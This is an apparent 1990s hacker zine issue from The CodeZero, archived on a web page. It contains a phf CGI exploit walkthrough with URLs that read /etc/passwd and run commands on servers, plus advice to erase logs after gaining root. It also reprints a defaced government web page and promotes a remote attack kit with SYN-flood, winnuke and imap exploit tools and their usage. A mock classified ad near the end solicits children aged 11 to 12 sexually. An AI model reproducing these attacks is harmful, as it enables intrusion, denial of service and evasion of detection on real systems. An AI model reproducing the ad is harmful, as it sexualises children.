???????????????????????????????????????????????????????????????????????????????
7. One Last Thing About The Infamous pHf Technique : so1o
???????????????????????????????????????????????????????????????????????????????

You can use this basic form of attack...[Thru NutScrape For Example]

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd
[ 1 ][ 2 ][ 3 ][ 4 ][5][ 6 ]

1: The Target Site.
2: The pHf Command.
3: The Magic pHf Arguments.
4: The Program You Wish To Run.
5: %20 Is A Space, so %20%20%20 == 3 Spaces.
6: The Arguments You Wish To Use.

Here Are Some Other Examples...
-------------------------------

http://www.site.com/cgi-bin/phf?Qalias=x&0a/bin/ls%20-la%20/etc/

...This will list the files in the /etc/ directory.

http://www.site.com/cgi-bin/phf?Qalias=x%0a/bin/uname%20-a

...This will display the operating system.

Remember : You execute the commands with pHf as the user nobody, so you can't
shutdown the system, echo "+ +" >> /.rhosts etc. etc. All the
stuff you throw at the system using phf will be logged too, so
if you do decide to hack the system, remember to kill the logs
when you get root :)

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ NEWS ]=====================[ .SECTION E. ]=======================[ NEWS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
1. Some History : nobody
???????????????????????????????????????????????????????????????????????????????

Electronic doom will soon be visited on U.S. computer networks by
information warriors, hackers, pannational groups of computer-wielding
religious extremists, possible agents of Libya and Iran, international
thugs and money-mad Internet savvy thieves.

John Deutch, director of Central Intelligence, testified to the
truth of the matter, so it must be graven in stone. In a long statement
composed in the august tone of the Cold Warrior, Deutch said to the
Senate Permanent Subcommittee on Investigations on June 25, "My greatest
concern is that hackers, terrorist organizations, or other nations might
use information warfare techniques" to disrupt the national
infrastructure.

The lack of solid evidence for any of the claims made by the intelligence
community has created an unusual stage on which two British hackers,
Datastream Cowboy and Kuji, were made the dog and pony in a ridiculous
show to demonstrate the threat of information warfare to members of
Congress. Because of a break-in at an Air Force facility in Rome, NY,
in 1994, booth hackers were made the stars of two Government Accounting
Office reports on network intrusions in the Department of Defense earlier
this year. The comings and goings of Datastream Cowboy also constitute the
meat of Gelber and Christy's minority staff report from the Subcommittee on
Investigations.

Before delving into it in detail, it's interesting to read what a
British newspaper published about Datastream Cowboy, a sixteen year-old,
about a year before he was made the poster boy for information
warfare and international hacking conspiracies in front of Congress.

In a brief article, blessedly so in contrast to the reams of propaganda
published on the incident for Congress, the July 5 1995 edition of The
Independent wrote, "[Datastream Cowboy] appeared before Bow Street
magistrates yesterday charged with unlawfully gaining access to a series
of American defense computers. Richard Pryce, who was 16 at the time of
the alleged offences, is accused of accessing key US Air Force systems
and a network owned by Lockheed, the missile and aircraft manufacturers."

Pryce, a resident of a northwest suburb of London did not enter a plea
on any of 12 charges levied against him under the British
Computer Misuse Act. He was arrested on May 12, 1994, by New Scotland
Yard as a result of work by the U.S. Air Force Office of Special
Investigations. The Times of London reported when police came for
Pryce, they found him at his PC on the third floor of his family's house.
Knowing he was about to be arrested, he "curled up on the floor and cried."

In Gelber and Christy's staff report, the tracking of Pryce, and to a
lesser extent a collaborator called Kuji -- real name Mathew Bevan, is
retold as an eight page appendix entitled "The Case Study: Rome
Laboratory, Griffiss Air Force Base, NY Intrusion."

Pryce's entry into Air Force computers was noticed on March 28, 1994,
when personnel discovered a sniffer program he had installed on one
of the Air Force systems in Rome. The Defense Information System
Agency (DISA) was notified. DISA subsequently called the Air
Force Office of Special Investigations (AFOSI) at the Air Force
Information Warfare Center in San Antonio, Texas. AFOSI then
sent a team to Rome to appraise the break-in, secure the system and
trace those responsible. During the process, the AFOSI team discovered
Datastream Cowboy had entered the Rome Air Force computers for the
first time on March 25, according to the report. Passwords had been
compromised, electronic mail read and deleted and unclassified
"battlefield simulation" data copied off the facility. The
Rome network was also used as a staging area for penetration of other
systems on the Internet.

AFOSI investigators initially traced the break-in back one step to
the New York City provider, Mindvox. According to the Congressional
report, this put the NYC provider under suspicion because "newspaper
articles" said Mindvox's computer security was furnished by two "former
Legion of Doom members." "The Legion of Doom is a loose-knit computer
hacker group which had several members convicted for intrusions into
corporate telephone switches in 1990 and 1991," wrote Gelber and Christy.

AFOSI then got permission to begin monitoring -- the equivalent of
wiretapping -- all communications on the Air Force network. Limited
observation of other Internet providers being used during the break-in
was conducted from the Rome facilities. Monitoring told the investigators
the handles of hackers involved in the Rome break-in were Datastream
Cowboy and Kuji.

Since the monitoring was of limited value in determining the whereabouts
of Datastream Cowboy and Kuji, AFOSI resorted to "their human intelligence
network of informants, i.e., stool pigeons, that 'surf the Internet.'
Gossip from one AFOSI 'Net stoolie uncovered that Datastream Cowboy was from
Britain. The anonymous source said he had e-mail correspondence with
Datastream Cowboy in which the hacker said he was a 16-year old living in
England who enjoyed penetrating ".MIL" systems. Datastream Cowboy also
apparently ran a bulletin board system and gave the telephone number to the
AFOSI source.

The Air Force team contacted New Scotland Yard and the British law
enforcement agency identified the residence, the home of Richard
Pryce, which corresponded to Datastream Cowboy's system phone number.
English authorities began observing Pryce's phone calls and noticed
he was making fraudulent use of British Telecom. In addition,
whenever intrusions at the Air Force network in Rome occurred, Pryce's
number was seen to be making illegal calls out of Britain.

Pryce travelled everywhere on the Internet, going through South America,
multiple countries in Europe and Mexico, occasionally entering the Rome
network. From Air Force computers, he would enter systems at Jet
Propulsion Laboratory in Pasadena, California, and the Goddard Space
Flight Center in Greenbelt, Maryland. Since Pryce was capturing the logins
and passwords of the Air Force networks in Rome, he was then able to
get into the home systems of Rome network users, defense contractors
like Lockheed.

By mid-April of 1994 the Air Force was monitoring other systems being
used by the British hackers. On the 14th of the month, Kuji logged on
to the Goddard Space Center from a system in Latvia and copied data
from it to the Baltic country. According to Gelber's report, the
AFOSI investigators assumed the worst, that it was a sign that someone
in an eastern European country was making a grab for sensitive
information. They broke the connection but not before Kuji had
copied files off the Goddard system. As it turned out, the Latvian
computer was just another system the British hackers were using as
a stepping stone; Pryce had also used it to cover his tracks when
penetrating networks at Wright-Patterson Air Force Base in Ohio, via
an intermediate system in Seattle, cyberspace.com.

The next day, Kuji was again observed trying to probe various
systems at NATO in Brussels and The Hague as well as Wright-Patterson.
On the 19th, Pryce successfully returned to NATO systems in The
Hague through Mindvox. The point Gelber and Christy seem to be trying
to make is that Kuji, a 21-year old, was coaching Pryce during some
of his attacks on various systems.

By this point, New Scotland Yard had a search warrant for Pryce
with the plan being to swoop down on him the next time he accessed
the Air Force network in Rome.

In April, Pryce penetrated a system on the Korean peninsula and copied
material off a facility called the Korean Atomic Research Institute
to an Air Force computer in Rome. At the time, the investigators had
no idea whether the system was in North or South Korea. The impression
created is one of hysteria and confusion at Rome. There was fear that the
system, if in North Korea, would trigger an international incident, with
the hack interpreted as an "aggressive act of war." The system turned
out to be in South Korea.

During the Korean break-in, New Scotland Yard could have intervened and
arrested Pryce. However, for unknown reasons, the agency did not. Those
with good memories may recall mainstream news reports concerning Pryce's
hack, which was cast as an entry into sensitive North Korean networks.

It's worth noting that while the story was portrayed as the work of
an anonymous hacker, both the U.S. government and New Scotland Yard knew
who the perpetrator was. Further, according to Gelber's report English
authorities already had a search warrant for Pryce's house.

Finally, on May 12 British authorities pounced. Pryce was arrested
and his residence searched. He crumbled, according to the Times of
London, and began to cry. Gelber and Christy write that Pryce promptly
admitted to the Air Force break-ins as well as others. Pryce
confessed he had copied a large program that used artificial intelligence
to construct theoretical Air Orders of Battle from an Air Force computer
to Mindvox and left it there because of its great size, 3-4 megabytes.
Pryce paid for his Internet service with a fraudulent credit card number.
At the time, the investigators were unable to find out the name and
whereabouts of Kuji. A lead to an Australian underground bulletin board
system failed to pan out.

On June 23 of this year, Reuters reported that Kuji -- 21-year-old Mathew
Bevan -- a computer technician, had been arrested and charged in
connection with the 1994 Air Force break-ins in Rome.

Rocker Tom Petty sang that even the losers get lucky some time. He
wasn't thinking of British computer hackers but no better words could be
used to describe the two Englishmen and a two year old chain of events that
led to fame as international computer terrorists in front of Congress
at the beginning of the summer of 1996.

Lacking much evidence for the case of conspiratorial computer-waged
campaigns of terror and chaos against the U.S., the makers of Congressional
reports resorted to telling the same story over and over, three
times in the space of the hearings on the subject. One envisions U.S.
Congressmen too stupid or apathetic to complain, "Hey, didn't we get that
yesterday, and the day before?" Pryce and Bevan appeared in "Security in
Cyberspace" and twice in Government Accounting Office reports AIMD-96-84
and T-AIMD96-92. Jim Christy, the co-author of "Security in Cyberspace"
and the Air Force Office of Special Investigations' source for the Pryce
case supplied the same tale for Jack Brock, author of the GAO reports.
Brock writes, ". . . Air Force officials told us that at least one of
the hackers may have been working for a foreign country interested in
obtaining military research data or areas in which the Air Force was
conducting advanced research." It was, apparently, more wishful
thinking.

This years UK hacking conference : Access All Areas.
http://www.access.org.uk
July 5th.

???????????????????????????????????????????????????????????????????????????????
2. [GUNNAR], MadSeason and sIn : so1o
???????????????????????????????????????????????????????????????????????????????
Some dudes called MadSeason and [GUNNAR] has been proving sIn's true lameness
and logging it all at the same time, phear elite logging skills...

##################################################################################
# #
# Darkfool #
# (What a Fool/The PHF hacker) #
# BY [GUNNAR] #
# #
##################################################################################

Ever read a hacking txt by this guy? Ever realize just how useless the
information his txt's are? Nothing in his txt files aren't covered in a hundred
text files written before which better explain hacking techniques. Like a quote
from my pal MadSeason goes:

"The fact is these txt files about hacking and phreaking are written by people
with minimal knowledge. Then you have some newbie who comes along wanting to be
some hacker god and reads a few files and has even less of a clue then the
writer had about the subject, then goes around spewing out bullshit and claiming
they are a hacker and/or phreaker, just an endless circle of ignorance."

That quote is so true. All these hack txt's realeased by these groups like
S.I.N. and Techonophoria are just crap. About the only exploit that Darkfool
knows the the PHF bug found in older versions of NCSA and Apache httpd. This
bug is very well know(And over exploited might I add.). Do a search for ac.jp or
edu.au domains, and adding to the address "cgi-bin/phf?Qalias=x%0a/bin/cat%20
/etc/passwd" is neither impressive nor is it even hacking. It's a lame excuse for
hacking.

Darkfool claims many things that he doesn't know. For instance, take pascal
programming. He claims to know it, but when asked a single question on it
by, Scorpion(MadSeason), he cannot answer. Here is a little something:

[13:53] <Scorpion> How many parameters do Cluster object constructors take in
pascal, DF?
[13:53] <Darkfool> i have no idea scorpion
[13:54] <Scorpion> I thought you knew Pascal
[13:54] <Darkfool> i am learning it at college

There is a big difference between knowing and learning. I guess Darkfool doesn't
realize that. It's all a part of trying to sound and seem "elite". Which
Darkfool is far from being. Seems as thought Darkfool and the rest of his S.I.N.
pals are compying MadSeason and myself, and questioning peoples abilities. It's
funny though, when MadSeason and I got to #sin questioning them, we get kicked
for making them look stupid. And when they as us something, and it doesn't go
quite as
they planned it. Look what they do...

[14:14] *** Now talking in #sin
[14:15] <Darkfool> hey
[14:15] <Darkfool> how do i kill all jobs running on a shell ?
<[GUNNAR]> Well hello there!
[14:15] <HoMeR> hey
<[GUNNAR]> kill -9 PID
<[GUNNAR]> If you really wanna kill it.
<[GUNNAR]> Boo Hoo.
<[GUNNAR]> Damn, that one didn't go well for you did it?
<[GUNNAR]> BTW, use the ps command to get the PID.
<[GUNNAR]> la la la la...
[14:17] *** Sinning sets mode: +b *!*@*.wco.com
[14:17] *** You were kicked by Fa|lur3 (banned)

In short, Darkfool, S.I.N. and the rest like him are really just wannabes
trying to sound big and bad. Nothing wrong with groups or people who actually
hack. But, when you have a group like S.I.N. who's members claim more than
they know, it is truely sad. I myself and no great hacker(I'm not a hack.
Plain and simple.) nor am I some s00per programmer. But the thing is, I do not
claim more than I actually know. This is obviously not how Darkfool thinks of
things. He wants to be known as a s00per hacker, which he is not.

I'm writing this so you(The Readers) don't buy into this bullshit and be misled
by people like Darkfool and the group he is in S.I.N.! They are truely sad
people. What a shame I have brought out the truth!

I think more is somewhere on http://www.ilf.net/teknopia/

???????????????????????????????????????????????????????????????????????????????
3. "Welcome to the [D]epartment of [O]wned [E]nergy" : so1o
???????????????????????????????????????????????????????????????????????????????
The http://www.doe.ca (Canadian Dept. of Energy) was changed last weekend...

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2//EN">
<HTML>
<HEAD>
<TITLE></TITLE>
<META NAME="Author" CONTENT="Tetsu Khan">
<META NAME="GENERATOR" CONTENT="Mozilla/3.01Gold (Win95; I) [Netscape]">
</HEAD>
<BODY TEXT="#FFFFFF" BGCOLOR="#000000" LINK="#FFFFFF" VLINK="#C0C0C0" ALINK="#FF0000">

<CENTER><P><B><TT><FONT COLOR="#FF0000"><FONT SIZE=+2>Welcome To The [D]epartment
of [O]wned [E]nergy</FONT></FONT></TT></B></P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P>You could define this as an act of aggression, or you could
define it as us, the hackers (or crackers), just adivising you to try and
make it more difficult for us, at least employ consultants etc. who have
a CLUE. because one day, in the not so distant future, the internet equivalent
of Pearl Harbour will occur, and we will only be around to say "We
told you so", until that day, we will keep reminding you, get some
security, its better for you, its better for us, its better for everyone.</P></CENTER>

<CENTER><P>In this case, even though your system runs HP-UX, we advise
you still take the time to look into all the exploits that are available
for this operating system, and then get over to www.cert.org to find some
advisories.</P></CENTER>

<CENTER><P>This attack was brought to you in association with 0range Amusements.</P></CENTER>

<CENTER><P><IMG SRC="pac001.gif" HEIGHT=190 WIDTH=175></P></CENTER>

<CENTER><P>Greets to so1o, helix, xFli, modeX, c0d, xrx, zer0x, organik,
phractal chaos and all the usual suspects.</P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P><TT><FONT COLOR="#FF0000">In the meantime, maybe you would like
to visit...</FONT></TT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="http://www.crackhouse.com">The CrackHouse</A></FONT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="http://micros0ft.paranoia.com">Micro$oft</A></FONT></P></CENTER>

<CENTER><P><FONT SIZE=+2><A HREF="http://www.codez.com">The CodeZero</A></FONT></P></CENTER>

<CENTER><P>
<HR WIDTH="100%"></P></CENTER>

<CENTER><P><B><TT><BLINK><FONT COLOR="#8000FF">We 0wN j00r EnErGy!@# wE
0wN j00R LiGhTbUlBz!@#~</FONT></BLINK></TT></B></P></CENTER>

</BODY>
</HTML>

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ PROJECTS ]=================[ .SECTION F. ]===================[ PROJECTS ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ so1o of The CodeZero presents. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ The CodeZero \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ Remote Attack Kit. \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ [CRAK] \-\=\-\=\-\=\-\=\-\=\-\=
=/-/=/-/=/-/=/-/=/-/=/-/ Version 1.666 \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
=/-/=/-/=/-/=/-/=/-/=/-/ .:. -=10/07/97=- .:. \-\=\-\=\-\=\-\=\-\=\-\=
-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/=/-/\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\-\=\
???????????????????????????????????????????????????????????????????????????????

New, improved, here it is...

===============================================================================
The Contents Of The Kit :
===============================================================================

dnsscan : Mass DNS query program, gets lists of systems in entire countries,
or all the systems on a network, like *.microsoft.com.

smscan : Sendmail version scanner, very useful.
phpscan : Scans hosts from a file and outputs a list of php vunerable sites.
phpget : Gets files from php vunerable servers.
phfscan : Scans hosts from a file and outputs a list of php vunerable sites.
ident-scan: Scans all daemons running on ports and determines cool stuff.
imap : Exploits imap bug if port 143 is open.

tcpprobe : Very simple portscanner.
fingah : Uses an apache hole to finger systems if port 79 isnt open.
synk5 : The SYN flooder, basically kicks the shit out of systems.
octopus : Octopus with UltiMods (ultima of CodeZero), crashes systems.
winuke : This version allows you to select a port, I advise 139 or 113.

===============================================================================
Usages :
===============================================================================

Use this command to unzip the crak.tar...

% tar -xvf crak.tar

then it will be copied into /crak, depending on the working directory..

DNSscan :
---------

Usage: dnscan [-file <filename>] [-domain <domain>] [-sub <subdomain>]

-file Usages <filename> as a list of subdomains and servers to scan.
-domain Lists all servers in a first level domain like com or net.
-subdomain Lists all servers in a domain.

The -domain mode will first create a file called 'domain.<domain>' with a
list of all subdomains and their name servers, and then use that file in
the -file mode.

The input file needs to have the following format:

<domain> <subdomain> [<dns>]

To list all servers in Japan, do "dnscan -domain jp"
To list all servers in the netcom domain, do "dnscan -sub netcom.com"

SMscan : smscan <hosts> <output>
PHPscan : phpscan <infile> <outfile>
PHPget : phpget <domain> <path and file>
PHFscan : phfscan <infile> <outfile>
Ident-Scan : ident-scan <host> [low port] [high port]
TCPprobe : tcpprobe <host>
Fingah : fingah <domain> <user>
Synk5 : synk5 <source ip> <target host> <low port> <high port>
Octopus : octopus <host> [port] (default port is 25)
Winnuke : winnuke <host> [port] (default port is 139)

===============================================================================
Where To Get CRAK.tar : http://www.codez.com
===============================================================================

It can be unzipped with WinZip if you are in W1nd0ze too.. :)

???????????????????????????????????????????????????????????????????????????????
===============================================================================
==[ FIN ]======================[ .SECTION G. ]========================[ FIN ]==
===============================================================================
???????????????????????????????????????????????????????????????????????????????
--------------------------------------+---------------------------------------
|
YOUR SPECIAL AD | LET'S BE FREE
|
COULD BE RIGHT HERE #@! | Gay White Male 38, 5'11" looking
| for men, 12 - 32 clean, fit, and
SEND ELECTRONIC MAIL TO: | hairy. Discreet Encounters.
[email protected] | Call Anytime : (816)781-8009
| (Ask for Tommy)
|
--------------------------------------+---------------------------------------
|
ARE YOU 11 OR 12 ??? | FREE FONESEX! CALL ME NOW!@
|
Looking for men 11 - 12 for adult | Yeah huney, you know you want me,
video satisfaction. I am 35 into | I'll treat you just right, I'm
Professional wrestling. | waiting for your call today!
Let's talk soon : (816)453-8722 | CALL ME NOW!@# : (847)546-9154
| (Ask for Kim)
--------------------------------------+---------------------------------------
???????????????????????????????????????????????????????????????????????????????
.oO The CodeZero Oo.
???????????????????????????????????????????????????????????????????????????????

_ /| k0dek4t sez...
\'o O'
=(_o_)= "EyEm HuNGaRy FoR CoDeZ,
U nOt CaTf00d!!#@"

----------------------------------
?--? HTTP://WWW.CODEZ.COM ?--?
----------------------------------

???????????????????????????????????????????????????????????????????????????????
Remember, McDonalds Owns You, And Ronald Is The KinG!!!
Wendy Is Satan!! Don't Believe The Lies!! PHEAR WENDY!@#*
???????????????????????????????????????????????????????????????????????????????
 
To the best of our knowledge, the text on this page may be freely reproduced and distributed.
If you have any questions about this, please check out our Copyright Policy.
 

totse.com certificate signatures
 
 
About | Advertise | Bad Ideas | Community | Contact Us | Copyright Policy | Drugs | Ego | Erotica
FAQ | Fringe | Link to totse.com | Search | Society | Submissions | Technology
Hot Topics
Reading childrens books weird?
What are you currently reading?
How often do you read?
Would you let your novel become a movie?
Penguin and Barnes and Noble, fleecing customer?
Chuck Palahniuk
What does reading mean for you?
Book Recommendation
 
Sponsored Links
 
Ads presented by the
AdBrite Ad Network

 

TSHIRT HELL T-SHIRTS
 
www.pigdog.org